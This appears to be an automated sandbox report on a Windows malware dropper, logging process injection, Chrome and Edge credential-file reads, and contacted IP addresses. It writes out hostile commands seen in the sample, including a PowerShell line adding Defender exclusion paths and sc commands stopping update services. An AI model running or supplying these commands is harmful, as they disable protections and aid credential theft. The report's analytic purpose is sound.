                    Source: C:\Windows\explorer.exeNetwork Connect: 50.116.112.43 80Jump to behavior
                    Source: C:\Windows\explorer.exeNetwork Connect: 71.33.141.248 80Jump to behavior
                    Source: C:\Windows\explorer.exeNetwork Connect: 103.120.80.111 80Jump to behavior
                    Source: C:\Windows\explorer.exeNetwork Connect: 43.154.67.170 80Jump to behavior
                    Source: C:\Windows\explorer.exeNetwork Connect: 3.33.130.190 80Jump to behavior
                    Source: C:\Users\user\Desktop\a\audiodgse.exeSection loaded: unknown target: C:\Program Files (x86)\rGrAmoMoqMwuTqnZRCybwYGKPnpcLDMjCfBRghbDIpwgyLgTSyrgXdXQGZfChuqeGs\LkeNkIcFYvnikmw.exe protection: execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\a\audiodgse.exeSection loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\a\sbinzx.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\a\sbinzx.exeSection loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\a\sbinzx.exeSection loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\pznhcda.exeSection loaded: unknown target: C:\Users\user\AppData\Local\Temp\pznhcda.exe protection: execute and read and write
                    Source: C:\Users\user\AppData\Local\Temp\pznhcda.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
                    Source: C:\Users\user\AppData\Local\Temp\pznhcda.exeSection loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write
                    Source: C:\Users\user\AppData\Local\Temp\pznhcda.exeSection loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write
                    Source: C:\Windows\SysWOW64\raserver.exeSection loaded: unknown target: C:\Program Files (x86)\rGrAmoMoqMwuTqnZRCybwYGKPnpcLDMjCfBRghbDIpwgyLgTSyrgXdXQGZfChuqeGs\LkeNkIcFYvnikmw.exe protection: read write
                    Source: C:\Windows\SysWOW64\raserver.exeSection loaded: unknown target: C:\Program Files (x86)\rGrAmoMoqMwuTqnZRCybwYGKPnpcLDMjCfBRghbDIpwgyLgTSyrgXdXQGZfChuqeGs\LkeNkIcFYvnikmw.exe protection: execute and read and write
                    Source: C:\Windows\SysWOW64\raserver.exeSection loaded: unknown target: unknown protection: read write
                    Source: C:\Windows\SysWOW64\raserver.exeSection loaded: unknown target: unknown protection: execute and read and write
                    Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                    Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
                    Source: C:\Windows\SysWOW64\raserver.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                    Source: C:\Windows\SysWOW64\raserver.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
                    Source: C:\Users\user\Desktop\a\sbinzx.exeMemory written: C:\Users\user\Desktop\a\sbinzx.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Windows\SysWOW64\raserver.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF722870000 value starts with: 4D5A
                    Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                    Source: C:\Users\user\Desktop\a\setup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                    Source: C:\Users\user\Desktop\a\sbinzx.exeSection unmapped: C:\Windows\SysWOW64\raserver.exe base address: F0000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\pznhcda.exeSection unmapped: C:\Windows\SysWOW64\colorcpl.exe base address: 400000
                    Source: C:\Windows\SysWOW64\raserver.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF722870000
                    Source: C:\Users\user\Desktop\a\setup.exeFile written: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\Desktop\a\sbinzx.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
                    Source: C:\Users\user\Desktop\a\sbinzx.exeThread register set: target process: 4056Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\pznhcda.exeThread register set: target process: 4056
                    Source: C:\Windows\SysWOW64\colorcpl.exeThread register set: target process: 4056
                    Source: C:\Windows\SysWOW64\raserver.exeThread register set: target process: 4056
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess created: C:\Users\user\Desktop\a\audiodgse.exe "C:\Users\user\Desktop\a\audiodgse.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess created: C:\Users\user\Desktop\a\sbinzx.exe "C:\Users\user\Desktop\a\sbinzx.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess created: C:\Users\user\Desktop\a\autolog.exe "C:\Users\user\Desktop\a\autolog.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess created: C:\Users\user\Desktop\a\setup.exe "C:\Users\user\Desktop\a\setup.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\a\audiodgse.exeProcess created: C:\Users\user\Desktop\a\audiodgse.exe C:\Users\user\Desktop\a\audiodgse.exeJump to behavior
                    Source: C:\Users\user\Desktop\a\sbinzx.exeProcess created: C:\Users\user\Desktop\a\sbinzx.exe C:\Users\user\Desktop\a\sbinzx.exeJump to behavior
                    Source: C:\Users\user\Desktop\a\sbinzx.exeProcess created: C:\Users\user\Desktop\a\sbinzx.exe C:\Users\user\Desktop\a\sbinzx.exeJump to behavior
                    Source: C:\Program Files (x86)\rGrAmoMoqMwuTqnZRCybwYGKPnpcLDMjCfBRghbDIpwgyLgTSyrgXdXQGZfChuqeGs\LkeNkIcFYvnikmw.exeProcess created: C:\Windows\SysWOW64\poqexec.exe C:\Windows\SysWOW64\poqexec.exe
                    Source: C:\Program Files (x86)\rGrAmoMoqMwuTqnZRCybwYGKPnpcLDMjCfBRghbDIpwgyLgTSyrgXdXQGZfChuqeGs\LkeNkIcFYvnikmw.exeProcess created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
                    Source: C:\Users\user\AppData\Local\Temp\pznhcda.exeProcess created: C:\Users\user\AppData\Local\Temp\pznhcda.exe C:\Users\user~1\AppData\Local\Temp\pznhcda.exe
                    Source: C:\Windows\SysWOW64\raserver.exeProcess created: unknown unknown
                    Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user~1\AppData\Local\Temp\pznhcda.exe"
                    Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\a\sbinzx.exe"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                    Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                    Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                    Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                    Source: explorer.exe, 0000000C.00000000.1298597652.0000000009013000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2272914280.0000000009013000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1291304585.0000000004880000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                    Source: explorer.exe, 0000000C.00000002.2488422698.0000000001440000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.1279897690.0000000001441000.00000002.00000001.00040000.00000000.sdmp, LkeNkIcFYvnikmw.exe, 0000000E.00000000.1279689655.0000000001261000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                    Source: explorer.exe, 0000000C.00000002.2488422698.0000000001440000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.1279897690.0000000001441000.00000002.00000001.00040000.00000000.sdmp, LkeNkIcFYvnikmw.exe, 0000000E.00000000.1279689655.0000000001261000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ?Program Manager
                    Source: explorer.exe, 0000000C.00000002.2476885450.0000000000C59000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1276039838.0000000000C59000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman
                    Source: explorer.exe, 0000000C.00000002.2488422698.0000000001440000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.1279897690.0000000001441000.00000002.00000001.00040000.00000000.sdmp, LkeNkIcFYvnikmw.exe, 0000000E.00000000.1279689655.0000000001261000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                    Source: C:\Users\user\Desktop\New_Text_Document.exeQueries volume information: C:\Users\user\Desktop\New_Text_Document.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\a\audiodgse.exeQueries volume information: C:\Users\user\Desktop\a\audiodgse.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\a\audiodgse.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\a\audiodgse.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\a\audiodgse.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\a\audiodgse.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\a\sbinzx.exeQueries volume information: C:\Users\user\Desktop\a\sbinzx.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\a\sbinzx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\a\sbinzx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\a\sbinzx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\a\sbinzx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Users\user\Desktop\New_Text_Document.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Lowering of HIPS / PFW / Operating System Security Settings

                    barindex
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                    Source: C:\Users\user\Desktop\a\setup.exeFile written: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Provider\Av\{D68DDC3A-831F-4fae-9E44-DA132C1ACF46} STATE
                    Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0000000F.00000002.1298666663.0000000000570000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0.2.New_Text_Document.exe.347db3e.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: New_Text_Document.exe PID: 7076, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\Desktop\a\kung.exe, type: DROPPED
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 16.2.pznhcda.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.pznhcda.exe.910000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.audiodgse.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.pznhcda.exe.910000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.sbinzx.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.sbinzx.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.audiodgse.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.pznhcda.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000010.00000002.1373397267.00000000009B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000002.2486958319.0000000004460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000002.2475448854.0000000002560000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.2485022491.00000000044B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1375358332.0000000002B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.1378872385.0000000000D30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.2485599667.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000002.2491293063.0000000004D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000002.2475106067.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000025.00000002.2495734545.0000000004EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000002.2489028637.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000002.2487485733.0000000004490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1370772038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.2475619657.00000000028D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.1368928520.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1369508767.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.1299234736.0000000000910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1287513905.0000000003AEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1368570053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.2490251590.0000000003E00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                    Source: C:\Windows\SysWOW64\raserver.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
                    Source: C:\Windows\SysWOW64\raserver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Windows\SysWOW64\raserver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\SysWOW64\raserver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                    Source: C:\Windows\SysWOW64\raserver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                    Source: C:\Windows\SysWOW64\raserver.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Windows\SysWOW64\raserver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                    Source: C:\Windows\SysWOW64\raserver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: Yara matchFile source: 0.2.New_Text_Document.exe.347db3e.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: C:\Users\user\Desktop\a\kung.exe, type: DROPPED

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0000000F.00000002.1298666663.0000000000570000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 16.2.pznhcda.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.pznhcda.exe.910000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.audiodgse.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.pznhcda.exe.910000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.sbinzx.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.sbinzx.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.audiodgse.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.pznhcda.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000010.00000002.1373397267.00000000009B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000002.2486958319.0000000004460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000002.2475448854.0000000002560000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.2485022491.00000000044B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1375358332.0000000002B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.1378872385.0000000000D30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.2485599667.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000002.2491293063.0000000004D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000002.2475106067.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000025.00000002.2495734545.0000000004EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000002.2489028637.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000002.2487485733.0000000004490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1370772038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.2475619657.00000000028D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.1368928520.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1369508767.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.1299234736.0000000000910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
